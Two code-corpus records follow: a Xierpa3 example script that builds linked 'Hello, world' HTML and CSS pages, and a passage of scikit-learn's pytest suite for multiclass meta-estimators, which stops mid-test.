petrvanblokland/Xierpa3 | xierpa3/sites/examples/helloworldpages/make.py | 1 | 8420 | # -*- coding: UTF-8 -*-
# -----------------------------------------------------------------------------
# xierpa server
# Copyright (c) 2014+ [email protected], www.petr.com, www.xierpa.com
#
# X I E R P A 3
# Distribution by the MIT License.
#
# -----------------------------------------------------------------------------
#
# make.py
#
import webbrowser
from xierpa3.components import Theme, Page, Column
from xierpa3.builders.cssbuilder import CssBuilder
from xierpa3.builders.htmlbuilder import HtmlBuilder
from xierpa3.attributes import Em, Margin, Color, Perc
BODYFAMILY = 'Georgia, serif'
class BaseHelloWorldText(Column):
# Get Constants->Config as class variable, so inheriting classes can redefine values.
C = Column.C
def buildBlock(self, b):
u"""Build a content base class. Inherited by specific HelloWorld... classes
that define the method **self.helloWorldText(b). In this example the CSS parameter
are still defined inside the block. Different from the real usage of BluePrint API parameter,
that allow modification from including components or inheriting components."""
b.div(class_=self.getClassName(), margin=Margin(0, self.C.AUTO, 0, self.C.AUTO),
width='70%', maxwidth=700, minwidth=300, backgroundcolor='#222',
padding=Em(0.5), fontfamily=BODYFAMILY, fontsize=Em(4), textalign=self.C.CENTER,
lineheight=Em(1.4))
self._helloWorldText(b)
b._div()
b.div(class_=self.C.CLASS_CAPTION, color=Color('#888'),
margin=Margin(0, self.C.AUTO, 0, self.C.AUTO),
width=Perc(70), maxwidth=700, minwidth=300,
paddingleft=Em(0.5), fontfamily=BODYFAMILY, fontsize=Em(0.8),
textalign=self.C.CENTER, lineheight=Em(1.4), fontstyle=self.C.ITALIC)
b.text('Intentionally non-responsive page example. Generated by Xierpa3.')
b._div()
class HelloWorldHome(BaseHelloWorldText):
u"""Private method. Inheriting from *BaseHelloWorldText* component, the class name generated by
@self.getClassName()@ results in @HelloWorldHome@. Color is different per page."""
def _helloWorldText(self, b):
b.div(color=Color('yellow')) # Color name will be translate to more reliable hex code.
b.text('Hello, world!')
b._div()
# TODO: Needs to clean up. JSON example goes to separate example site.
def buildAjaxDict(self, site, d):
myD = d['HelloWorldHome'] = {}
myD['name'] = 'Petr'
myD['message'] = 'Hello'
myD['fontName'] = site.e.form['font'] or 'notdefined'
return d
class HelloWorldOther1(BaseHelloWorldText):
u"""Private method. Inheriting from *BaseHelloWorldText* component, the class name generated by
@self.getClassName()@ results in @HelloWorldHome@. Color is different per page."""
def _helloWorldText(self, b):
b.div(color=Color('#00FF00')) # Show the text on this page in another color, to visualize the difference.
# TODO: Needs to clean up. JSON example goes to separate example site.
b.a(href='/ajax/font-MyFont')
b.text('Hello, world on another page using MyFont')
b._a()
b._div()
# TODO: Needs to clean up. JSON example goes to separate example site.
def buildAjaxDict(self, site, d):
myD = d['HelloWorldOther1'] = {}
myD['message'] = 'Hello ' * 10
return d
class HelloWorldOther2(BaseHelloWorldText):
u"""Private method. Inheriting from *BaseHelloWorldText* component, the class name generated by
@self.getClassName()@ results in @HelloWorldHome@. Color is different per page."""
def _helloWorldText(self, b):
b.div(color=Color('#00FFFF')) # Show the text on this page in another color, to visualize the difference.
b.text('And yet another world on this page.')
b._div()
class Navigation(Column):
# Get Constants->Config as class variable, so inheriting classes can redefine values.
C = Column.C
def buildBlock(self, b):
b.div(class_=self.getClassName(), margin=Margin(0, self.C.AUTO, 0, self.C.AUTO),
width=Perc(40), maxwidth=700, minwidth=300, backgroundcolor=Color('#DDD'),
padding=Em(0.5), fontfamily=BODYFAMILY, textalign=self.C.CENTER)
# Still doing content and page identifiers directly, without adapter, in this example.
b.text(' | ')
for pageId in HelloWorldPages.PAGES:
# Making a reference to the page class is enough to build the url.
b.a(href='/'+pageId, fontsize=Em(1), color=Color('#444'))
b.text(pageId.capitalize()) # Make simple label in the menu from page id..
b._a()
b.text(' | ')
b._div()
class HelloWorldPages(Theme):
u"""The **HelloWorldLayout** class implements a basic "Hello, world!" page, running as
batch process, saving the result as an HTML file. Also it is available in the example webserver,
e.g. through the Xierpa3App."""
# Get Constants->Config as class variable, so inheriting classes can redefine values.
C = Theme.C
TITLE = u'The layout version of "Hello, world!" page.' # Use as title of window.
TEMPLATE_OTHER1 = 'other'
TEMPLATE_OTHER2 = 'otherworld'
PAGES = (C.TEMPLATE_INDEX, TEMPLATE_OTHER1, TEMPLATE_OTHER2)
def baseComponents(self):
u"""Create a theme site with just one single template home page. Answer a list
of page instances that are used as templates for this site."""
# Create an instance (=object) of the text component to be placed on the page.
navigation = Navigation()
home = HelloWorldHome() # Example text component for the home page.
other1 = HelloWorldOther1() # Example text component for the other1Page
other2 = HelloWorldOther2() # Example text component for the other2Page
# Create an instance (=object) of the page, containing the "hw" component.
# The class is also the page name in the url. The navigation simply refers
# to the url by class nane.
homePage = Page(class_=self.C.TEMPLATE_INDEX, components=(navigation, home),
title=self.TITLE + '|' + self.C.TEMPLATE_INDEX)
other1Page = Page(class_=self.TEMPLATE_OTHER1, components=(navigation, other1),
title=self.TITLE + '|' + self.TEMPLATE_OTHER1)
other2Page = Page(class_=self.TEMPLATE_OTHER2, components=(navigation, other2),
title=self.TITLE + '|' + self.TEMPLATE_OTHER2)
# Answer a list of types of pages for this site.
return [homePage, other1Page, other2Page]
def make(self, root=None):
u"""The instance of this class builds CSS and HTML files at the optional path **root**.
If not defined, then the default ~/Desktop/Xierpa3Examples/[component.name] is used as export path,
as set by Builder.DEFAULT_ROOTPATH"""
# Create an "instance" (=object) of type "HelloWorldLayout". The type (=class) defines
# the behavior of the object that is made by calling the class.
# C S S
# Create the main CSS builder instance to build the SASS/CSS part of the site.
cssBuilder = CssBuilder()
# Compile (=build) the SCSS to CSS and save the file in "css/style.css".
self.build(cssBuilder) # Build from entire site theme, not just from template. Result is stream in builder.
cssBuilder.save(self, root)
# H T M L
# Create the main HTML builder instance to build the HTML part of the site.
htmlBuilder = HtmlBuilder()
# Compile the HTML and save the resulting HTML file in "helloWorld.html".
self.build(htmlBuilder) # Build from entire site theme, not just from template. Result is stream in builder.
# Answer the path, so we can directly open the file with a browser.
return htmlBuilder.save(self, root)
if __name__ == '__main__':
# TODO: Why is the browser loading the CSS for every page?
# This construction "__name__ == '__main__'" makes this Python file only
# be executed when called in direct mode, such as "python make.py" in the terminal.
# Since no rootPath is added to make(), the file export is in ~/Desktop/Xierpa3Examples/HelloWorldLayout/
path = HelloWorldPages().make()
webbrowser.open(path)
| mit | -3,560,916,106,662,295,000 | 49.722892 | 116 | 0.644656 | false |
anntzer/scikit-learn | sklearn/tests/test_multiclass.py | 5 | 32749 | import numpy as np
import scipy.sparse as sp
import pytest
from re import escape
from sklearn.utils._testing import assert_array_equal
from sklearn.utils._testing import assert_almost_equal
from sklearn.utils._testing import ignore_warnings
from sklearn.utils._mocking import CheckingClassifier
from sklearn.multiclass import OneVsRestClassifier
from sklearn.multiclass import OneVsOneClassifier
from sklearn.multiclass import OutputCodeClassifier
from sklearn.utils.multiclass import (check_classification_targets,
type_of_target)
from sklearn.utils import (
check_array,
shuffle,
)
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.svm import LinearSVC, SVC
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import (LinearRegression, Lasso, ElasticNet, Ridge,
Perceptron, LogisticRegression,
SGDClassifier)
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.model_selection import GridSearchCV, cross_val_score
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.impute import SimpleImputer
from sklearn import svm
from sklearn.exceptions import NotFittedError
from sklearn import datasets
iris = datasets.load_iris()
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
n_classes = 3
def test_ovr_exceptions():
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
# test predicting without fitting
with pytest.raises(NotFittedError):
ovr.predict([])
# Fail on multioutput data
msg = "Multioutput target data is not supported with label binarization"
with pytest.raises(ValueError, match=msg):
X = np.array([[1, 0], [0, 1]])
y = np.array([[1, 2], [3, 1]])
OneVsRestClassifier(MultinomialNB()).fit(X, y)
with pytest.raises(ValueError, match=msg):
X = np.array([[1, 0], [0, 1]])
y = np.array([[1.5, 2.4], [3.1, 0.8]])
OneVsRestClassifier(MultinomialNB()).fit(X, y)
def test_check_classification_targets():
# Test that check_classification_target return correct type. #5782
y = np.array([0.0, 1.1, 2.0, 3.0])
msg = type_of_target(y)
with pytest.raises(ValueError, match=msg):
check_classification_targets(y)
def test_ovr_fit_predict():
# A classifier which implements decision_function.
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes
clf = LinearSVC(random_state=0)
pred2 = clf.fit(iris.data, iris.target).predict(iris.data)
assert np.mean(iris.target == pred) == np.mean(iris.target == pred2)
# A classifier which implements predict_proba.
ovr = OneVsRestClassifier(MultinomialNB())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert np.mean(iris.target == pred) > 0.65
def test_ovr_partial_fit():
# Test if partial_fit is working as intended
X, y = shuffle(iris.data, iris.target, random_state=0)
ovr = OneVsRestClassifier(MultinomialNB())
ovr.partial_fit(X[:100], y[:100], np.unique(y))
ovr.partial_fit(X[100:], y[100:])
pred = ovr.predict(X)
ovr2 = OneVsRestClassifier(MultinomialNB())
pred2 = ovr2.fit(X, y).predict(X)
assert_almost_equal(pred, pred2)
assert len(ovr.estimators_) == len(np.unique(y))
assert np.mean(y == pred) > 0.65
# Test when mini batches doesn't have all classes
# with SGDClassifier
X = np.abs(np.random.randn(14, 2))
y = [1, 1, 1, 1, 2, 3, 3, 0, 0, 2, 3, 1, 2, 3]
ovr = OneVsRestClassifier(SGDClassifier(max_iter=1, tol=None,
shuffle=False, random_state=0))
ovr.partial_fit(X[:7], y[:7], np.unique(y))
ovr.partial_fit(X[7:], y[7:])
pred = ovr.predict(X)
ovr1 = OneVsRestClassifier(SGDClassifier(max_iter=1, tol=None,
shuffle=False, random_state=0))
pred1 = ovr1.fit(X, y).predict(X)
assert np.mean(pred == y) == np.mean(pred1 == y)
# test partial_fit only exists if estimator has it:
ovr = OneVsRestClassifier(SVC())
assert not hasattr(ovr, "partial_fit")
def test_ovr_partial_fit_exceptions():
ovr = OneVsRestClassifier(MultinomialNB())
X = np.abs(np.random.randn(14, 2))
y = [1, 1, 1, 1, 2, 3, 3, 0, 0, 2, 3, 1, 2, 3]
ovr.partial_fit(X[:7], y[:7], np.unique(y))
# If a new class that was not in the first call of partial fit is seen
# it should raise ValueError
y1 = [5] + y[7:-1]
msg = r"Mini-batch contains \[.+\] while classes must be subset of \[.+\]"
with pytest.raises(ValueError, match=msg):
ovr.partial_fit(X=X[7:], y=y1)
def test_ovr_ovo_regressor():
# test that ovr and ovo work on regressors which don't have a decision_
# function
ovr = OneVsRestClassifier(DecisionTreeRegressor())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes
assert_array_equal(np.unique(pred), [0, 1, 2])
# we are doing something sensible
assert np.mean(pred == iris.target) > .9
ovr = OneVsOneClassifier(DecisionTreeRegressor())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes * (n_classes - 1) / 2
assert_array_equal(np.unique(pred), [0, 1, 2])
# we are doing something sensible
assert np.mean(pred == iris.target) > .9
def test_ovr_fit_predict_sparse():
for sparse in [sp.csr_matrix, sp.csc_matrix, sp.coo_matrix, sp.dok_matrix,
sp.lil_matrix]:
base_clf = MultinomialNB(alpha=1)
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=True,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
Y_pred = clf.predict(X_test)
clf_sprs = OneVsRestClassifier(base_clf).fit(X_train, sparse(Y_train))
Y_pred_sprs = clf_sprs.predict(X_test)
assert clf.multilabel_
assert sp.issparse(Y_pred_sprs)
assert_array_equal(Y_pred_sprs.toarray(), Y_pred)
# Test predict_proba
Y_proba = clf_sprs.predict_proba(X_test)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = Y_proba > .5
assert_array_equal(pred, Y_pred_sprs.toarray())
# Test decision_function
clf = svm.SVC()
clf_sprs = OneVsRestClassifier(clf).fit(X_train, sparse(Y_train))
dec_pred = (clf_sprs.decision_function(X_test) > 0).astype(int)
assert_array_equal(dec_pred, clf_sprs.predict(X_test).toarray())
def test_ovr_always_present():
# Test that ovr works with classes that are always present or absent.
# Note: tests is the case where _ConstantPredictor is utilised
X = np.ones((10, 2))
X[:5, :] = 0
# Build an indicator matrix where two features are always on.
# As list of lists, it would be: [[int(i >= 5), 2, 3] for i in range(10)]
y = np.zeros((10, 3))
y[5:, 0] = 1
y[:, 1] = 1
y[:, 2] = 1
ovr = OneVsRestClassifier(LogisticRegression())
msg = r'Label .+ is present in all training examples'
with pytest.warns(UserWarning, match=msg):
ovr.fit(X, y)
y_pred = ovr.predict(X)
assert_array_equal(np.array(y_pred), np.array(y))
y_pred = ovr.decision_function(X)
assert np.unique(y_pred[:, -2:]) == 1
y_pred = ovr.predict_proba(X)
assert_array_equal(y_pred[:, -1], np.ones(X.shape[0]))
# y has a constantly absent label
y = np.zeros((10, 2))
y[5:, 0] = 1 # variable label
ovr = OneVsRestClassifier(LogisticRegression())
msg = r'Label not 1 is present in all training examples'
with pytest.warns(UserWarning, match=msg):
ovr.fit(X, y)
y_pred = ovr.predict_proba(X)
assert_array_equal(y_pred[:, -1], np.zeros(X.shape[0]))
def test_ovr_multiclass():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 0, 5], [0, 5, 0], [3, 0, 0], [0, 0, 6], [6, 0, 0]])
y = ["eggs", "spam", "ham", "eggs", "ham"]
Y = np.array([[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[0, 0, 1],
[1, 0, 0]])
classes = set("ham eggs spam".split())
for base_clf in (MultinomialNB(), LinearSVC(random_state=0),
LinearRegression(), Ridge(),
ElasticNet()):
clf = OneVsRestClassifier(base_clf).fit(X, y)
assert set(clf.classes_) == classes
y_pred = clf.predict(np.array([[0, 0, 4]]))[0]
assert_array_equal(y_pred, ["eggs"])
# test input as label indicator matrix
clf = OneVsRestClassifier(base_clf).fit(X, Y)
y_pred = clf.predict([[0, 0, 4]])[0]
assert_array_equal(y_pred, [0, 0, 1])
def test_ovr_binary():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 0, 5], [0, 5, 0], [3, 0, 0], [0, 0, 6], [6, 0, 0]])
y = ["eggs", "spam", "spam", "eggs", "spam"]
Y = np.array([[0, 1, 1, 0, 1]]).T
classes = set("eggs spam".split())
def conduct_test(base_clf, test_predict_proba=False):
clf = OneVsRestClassifier(base_clf).fit(X, y)
assert set(clf.classes_) == classes
y_pred = clf.predict(np.array([[0, 0, 4]]))[0]
assert_array_equal(y_pred, ["eggs"])
if hasattr(base_clf, 'decision_function'):
dec = clf.decision_function(X)
assert dec.shape == (5,)
if test_predict_proba:
X_test = np.array([[0, 0, 4]])
probabilities = clf.predict_proba(X_test)
assert 2 == len(probabilities[0])
assert (clf.classes_[np.argmax(probabilities, axis=1)] ==
clf.predict(X_test))
# test input as label indicator matrix
clf = OneVsRestClassifier(base_clf).fit(X, Y)
y_pred = clf.predict([[3, 0, 0]])[0]
assert y_pred == 1
for base_clf in (LinearSVC(random_state=0), LinearRegression(),
Ridge(), ElasticNet()):
conduct_test(base_clf)
for base_clf in (MultinomialNB(), SVC(probability=True),
LogisticRegression()):
conduct_test(base_clf, test_predict_proba=True)
def test_ovr_multilabel():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 4, 5], [0, 5, 0], [3, 3, 3], [4, 0, 6], [6, 0, 0]])
y = np.array([[0, 1, 1],
[0, 1, 0],
[1, 1, 1],
[1, 0, 1],
[1, 0, 0]])
for base_clf in (MultinomialNB(), LinearSVC(random_state=0),
LinearRegression(), Ridge(),
ElasticNet(), Lasso(alpha=0.5)):
clf = OneVsRestClassifier(base_clf).fit(X, y)
y_pred = clf.predict([[0, 4, 4]])[0]
assert_array_equal(y_pred, [0, 1, 1])
assert clf.multilabel_
def test_ovr_fit_predict_svc():
ovr = OneVsRestClassifier(svm.SVC())
ovr.fit(iris.data, iris.target)
assert len(ovr.estimators_) == 3
assert ovr.score(iris.data, iris.target) > .9
def test_ovr_multilabel_dataset():
base_clf = MultinomialNB(alpha=1)
for au, prec, recall in zip((True, False), (0.51, 0.66), (0.51, 0.80)):
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=2,
length=50,
allow_unlabeled=au,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test, Y_test = X[80:], Y[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
Y_pred = clf.predict(X_test)
assert clf.multilabel_
assert_almost_equal(precision_score(Y_test, Y_pred, average="micro"),
prec,
decimal=2)
assert_almost_equal(recall_score(Y_test, Y_pred, average="micro"),
recall,
decimal=2)
def test_ovr_multilabel_predict_proba():
base_clf = MultinomialNB(alpha=1)
for au in (False, True):
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=au,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
# Decision function only estimator.
decision_only = OneVsRestClassifier(svm.SVR()).fit(X_train, Y_train)
assert not hasattr(decision_only, 'predict_proba')
# Estimator with predict_proba disabled, depending on parameters.
decision_only = OneVsRestClassifier(svm.SVC(probability=False))
assert not hasattr(decision_only, 'predict_proba')
decision_only.fit(X_train, Y_train)
assert not hasattr(decision_only, 'predict_proba')
assert hasattr(decision_only, 'decision_function')
# Estimator which can get predict_proba enabled after fitting
gs = GridSearchCV(svm.SVC(probability=False),
param_grid={'probability': [True]})
proba_after_fit = OneVsRestClassifier(gs)
assert not hasattr(proba_after_fit, 'predict_proba')
proba_after_fit.fit(X_train, Y_train)
assert hasattr(proba_after_fit, 'predict_proba')
Y_pred = clf.predict(X_test)
Y_proba = clf.predict_proba(X_test)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = Y_proba > .5
assert_array_equal(pred, Y_pred)
def test_ovr_single_label_predict_proba():
base_clf = MultinomialNB(alpha=1)
X, Y = iris.data, iris.target
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
# Decision function only estimator.
decision_only = OneVsRestClassifier(svm.SVR()).fit(X_train, Y_train)
assert not hasattr(decision_only, 'predict_proba')
Y_pred = clf.predict(X_test)
Y_proba = clf.predict_proba(X_test)
assert_almost_equal(Y_proba.sum(axis=1), 1.0)
# predict assigns a label if the probability that the
# sample has the label with the greatest predictive probability.
pred = Y_proba.argmax(axis=1)
assert not (pred - Y_pred).any()
def test_ovr_multilabel_decision_function():
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=True,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(svm.SVC()).fit(X_train, Y_train)
assert_array_equal((clf.decision_function(X_test) > 0).astype(int),
clf.predict(X_test))
def test_ovr_single_label_decision_function():
X, Y = datasets.make_classification(n_samples=100,
n_features=20,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(svm.SVC()).fit(X_train, Y_train)
assert_array_equal(clf.decision_function(X_test).ravel() > 0,
clf.predict(X_test))
def test_ovr_gridsearch():
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ovr, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert best_C in Cs
def test_ovr_pipeline():
# Test with pipeline of length one
# This test is needed because the multiclass estimators may fail to detect
# the presence of predict_proba or decision_function.
clf = Pipeline([("tree", DecisionTreeClassifier())])
ovr_pipe = OneVsRestClassifier(clf)
ovr_pipe.fit(iris.data, iris.target)
ovr = OneVsRestClassifier(DecisionTreeClassifier())
ovr.fit(iris.data, iris.target)
assert_array_equal(ovr.predict(iris.data), ovr_pipe.predict(iris.data))
# TODO: Remove this test in version 1.1
# when the coef_ attribute is removed
@ignore_warnings(category=FutureWarning)
def test_ovr_coef_():
for base_classifier in [SVC(kernel='linear', random_state=0),
LinearSVC(random_state=0)]:
# SVC has sparse coef with sparse input data
ovr = OneVsRestClassifier(base_classifier)
for X in [iris.data, sp.csr_matrix(iris.data)]:
# test with dense and sparse coef
ovr.fit(X, iris.target)
shape = ovr.coef_.shape
assert shape[0] == n_classes
assert shape[1] == iris.data.shape[1]
# don't densify sparse coefficients
assert (sp.issparse(ovr.estimators_[0].coef_) ==
sp.issparse(ovr.coef_))
# TODO: Remove this test in version 1.1
# when the coef_ attribute is removed
@ignore_warnings(category=FutureWarning)
def test_ovr_coef_exceptions():
# Not fitted exception!
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
with pytest.raises(NotFittedError):
ovr.coef_
# Doesn't have coef_ exception!
ovr = OneVsRestClassifier(DecisionTreeClassifier())
ovr.fit(iris.data, iris.target)
msg = "Base estimator doesn't have a coef_ attribute"
with pytest.raises(AttributeError, match=msg):
ovr.coef_
# TODO: Remove this test in version 1.1 when
# the coef_ and intercept_ attributes are removed
def test_ovr_deprecated_coef_intercept():
ovr = OneVsRestClassifier(SVC(kernel="linear"))
ovr = ovr.fit(iris.data, iris.target)
msg = (r"Attribute {0} was deprecated in version 0.24 "
r"and will be removed in 1.1 \(renaming of 0.26\). If you observe "
r"this warning while using RFE or SelectFromModel, "
r"use the importance_getter parameter instead.")
for att in ["coef_", "intercept_"]:
with pytest.warns(FutureWarning, match=msg.format(att)):
getattr(ovr, att)
def test_ovo_exceptions():
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
with pytest.raises(NotFittedError):
ovo.predict([])
def test_ovo_fit_on_list():
# Test that OneVsOne fitting works with a list of targets and yields the
# same output as predict from an array
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
prediction_from_array = ovo.fit(iris.data, iris.target).predict(iris.data)
iris_data_list = [list(a) for a in iris.data]
prediction_from_list = ovo.fit(iris_data_list,
list(iris.target)).predict(iris_data_list)
assert_array_equal(prediction_from_array, prediction_from_list)
def test_ovo_fit_predict():
# A classifier which implements decision_function.
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
ovo.fit(iris.data, iris.target).predict(iris.data)
assert len(ovo.estimators_) == n_classes * (n_classes - 1) / 2
# A classifier which implements predict_proba.
ovo = OneVsOneClassifier(MultinomialNB())
ovo.fit(iris.data, iris.target).predict(iris.data)
assert len(ovo.estimators_) == n_classes * (n_classes - 1) / 2
def test_ovo_partial_fit_predict():
temp = datasets.load_iris()
X, y = temp.data, temp.target
ovo1 = OneVsOneClassifier(MultinomialNB())
ovo1.partial_fit(X[:100], y[:100], np.unique(y))
ovo1.partial_fit(X[100:], y[100:])
pred1 = ovo1.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
ovo2.fit(X, y)
pred2 = ovo2.predict(X)
assert len(ovo1.estimators_) == n_classes * (n_classes - 1) / 2
assert np.mean(y == pred1) > 0.65
assert_almost_equal(pred1, pred2)
# Test when mini-batches have binary target classes
ovo1 = OneVsOneClassifier(MultinomialNB())
ovo1.partial_fit(X[:60], y[:60], np.unique(y))
ovo1.partial_fit(X[60:], y[60:])
pred1 = ovo1.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
pred2 = ovo2.fit(X, y).predict(X)
assert_almost_equal(pred1, pred2)
assert len(ovo1.estimators_) == len(np.unique(y))
assert np.mean(y == pred1) > 0.65
ovo = OneVsOneClassifier(MultinomialNB())
X = np.random.rand(14, 2)
y = [1, 1, 2, 3, 3, 0, 0, 4, 4, 4, 4, 4, 2, 2]
ovo.partial_fit(X[:7], y[:7], [0, 1, 2, 3, 4])
ovo.partial_fit(X[7:], y[7:])
pred = ovo.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
pred2 = ovo2.fit(X, y).predict(X)
assert_almost_equal(pred, pred2)
# raises error when mini-batch does not have classes from all_classes
ovo = OneVsOneClassifier(MultinomialNB())
error_y = [0, 1, 2, 3, 4, 5, 2]
message_re = escape("Mini-batch contains {0} while "
"it must be subset of {1}".format(np.unique(error_y),
np.unique(y)))
with pytest.raises(ValueError, match=message_re):
ovo.partial_fit(X[:7], error_y, np.unique(y))
# test partial_fit only exists if estimator has it:
ovr = OneVsOneClassifier(SVC())
assert not hasattr(ovr, "partial_fit")
def test_ovo_decision_function():
n_samples = iris.data.shape[0]
ovo_clf = OneVsOneClassifier(LinearSVC(random_state=0))
# first binary
ovo_clf.fit(iris.data, iris.target == 0)
decisions = ovo_clf.decision_function(iris.data)
assert decisions.shape == (n_samples,)
# then multi-class
ovo_clf.fit(iris.data, iris.target)
decisions = ovo_clf.decision_function(iris.data)
assert decisions.shape == (n_samples, n_classes)
assert_array_equal(decisions.argmax(axis=1), ovo_clf.predict(iris.data))
# Compute the votes
votes = np.zeros((n_samples, n_classes))
k = 0
for i in range(n_classes):
for j in range(i + 1, n_classes):
pred = ovo_clf.estimators_[k].predict(iris.data)
votes[pred == 0, i] += 1
votes[pred == 1, j] += 1
k += 1
# Extract votes and verify
assert_array_equal(votes, np.round(decisions))
for class_idx in range(n_classes):
# For each sample and each class, there only 3 possible vote levels
# because they are only 3 distinct class pairs thus 3 distinct
# binary classifiers.
# Therefore, sorting predictions based on votes would yield
# mostly tied predictions:
assert set(votes[:, class_idx]).issubset(set([0., 1., 2.]))
# The OVO decision function on the other hand is able to resolve
# most of the ties on this data as it combines both the vote counts
# and the aggregated confidence levels of the binary classifiers
# to compute the aggregate decision function. The iris dataset
# has 150 samples with a couple of duplicates. The OvO decisions
# can resolve most of the ties:
assert len(np.unique(decisions[:, class_idx])) > 146
def test_ovo_gridsearch():
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ovo, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert best_C in Cs
def test_ovo_ties():
# Test that ties are broken using the decision function,
# not defaulting to the smallest label
X = np.array([[1, 2], [2, 1], [-2, 1], [-2, -1]])
y = np.array([2, 0, 1, 2])
multi_clf = OneVsOneClassifier(Perceptron(shuffle=False, max_iter=4,
tol=None))
ovo_prediction = multi_clf.fit(X, y).predict(X)
ovo_decision = multi_clf.decision_function(X)
# Classifiers are in order 0-1, 0-2, 1-2
# Use decision_function to compute the votes and the normalized
# sum_of_confidences, which is used to disambiguate when there is a tie in
# votes.
votes = np.round(ovo_decision)
normalized_confidences = ovo_decision - votes
# For the first point, there is one vote per class
assert_array_equal(votes[0, :], 1)
# For the rest, there is no tie and the prediction is the argmax
assert_array_equal(np.argmax(votes[1:], axis=1), ovo_prediction[1:])
# For the tie, the prediction is the class with the highest score
assert ovo_prediction[0] == normalized_confidences[0].argmax()
def test_ovo_ties2():
# test that ties can not only be won by the first two labels
X = np.array([[1, 2], [2, 1], [-2, 1], [-2, -1]])
y_ref = np.array([2, 0, 1, 2])
# cycle through labels so that each label wins once
for i in range(3):
y = (y_ref + i) % 3
multi_clf = OneVsOneClassifier(Perceptron(shuffle=False, max_iter=4,
tol=None))
ovo_prediction = multi_clf.fit(X, y).predict(X)
assert ovo_prediction[0] == i % 3
def test_ovo_string_y():
# Test that the OvO doesn't mess up the encoding of string labels
X = np.eye(4)
y = np.array(['a', 'b', 'c', 'd'])
ovo = OneVsOneClassifier(LinearSVC())
ovo.fit(X, y)
assert_array_equal(y, ovo.predict(X))
def test_ovo_one_class():
# Test error for OvO with one class
X = np.eye(4)
y = np.array(['a'] * 4)
ovo = OneVsOneClassifier(LinearSVC())
msg = "when only one class"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
def test_ovo_float_y():
# Test that the OvO errors on float targets
X = iris.data
y = iris.data[:, 0]
ovo = OneVsOneClassifier(LinearSVC())
msg = "Unknown label type"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
def test_ecoc_exceptions():
ecoc = OutputCodeClassifier(LinearSVC(random_state=0))
with pytest.raises(NotFittedError):
ecoc.predict([])
def test_ecoc_fit_predict():
# A classifier which implements decision_function.
ecoc = OutputCodeClassifier(LinearSVC(random_state=0),
code_size=2, random_state=0)
ecoc.fit(iris.data, iris.target).predict(iris.data)
assert len(ecoc.estimators_) == n_classes * 2
# A classifier which implements predict_proba.
ecoc = OutputCodeClassifier(MultinomialNB(), code_size=2, random_state=0)
ecoc.fit(iris.data, iris.target).predict(iris.data)
assert len(ecoc.estimators_) == n_classes * 2
def test_ecoc_gridsearch():
ecoc = OutputCodeClassifier(LinearSVC(random_state=0),
random_state=0)
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ecoc, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert best_C in Cs
def test_ecoc_float_y():
# Test that the OCC errors on float targets
X = iris.data
y = iris.data[:, 0]
ovo = OutputCodeClassifier(LinearSVC())
msg = "Unknown label type"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
ovo = OutputCodeClassifier(LinearSVC(), code_size=-1)
msg = "code_size should be greater than 0, got -1"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
def test_ecoc_delegate_sparse_base_estimator():
# Non-regression test for
# https://github.com/scikit-learn/scikit-learn/issues/17218
